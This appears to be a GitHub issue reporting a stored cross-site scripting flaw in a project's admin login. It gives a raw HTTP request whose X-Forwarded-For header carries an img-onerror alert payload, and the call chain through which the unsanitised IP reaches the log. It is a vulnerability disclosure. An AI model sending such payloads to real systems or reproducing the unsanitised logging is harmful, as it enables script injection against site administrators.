We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
登录添加X-Forward-IP头
POST /admin/getLogin HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 56 Connection: close Cookie: JSESSIONID= X-Forwarded-For: 127.<img src=1 onerror=alert(123)>0.0.2
触发链 AdminController.getLogin() LogServiceImpl.save() ServletUtil.getClietnIP()
The text was updated successfully, but these errors were encountered:
No branches or pull requests
登录添加X-Forward-IP头
触发链
AdminController.getLogin()
LogServiceImpl.save()
ServletUtil.getClietnIP()
The text was updated successfully, but these errors were encountered: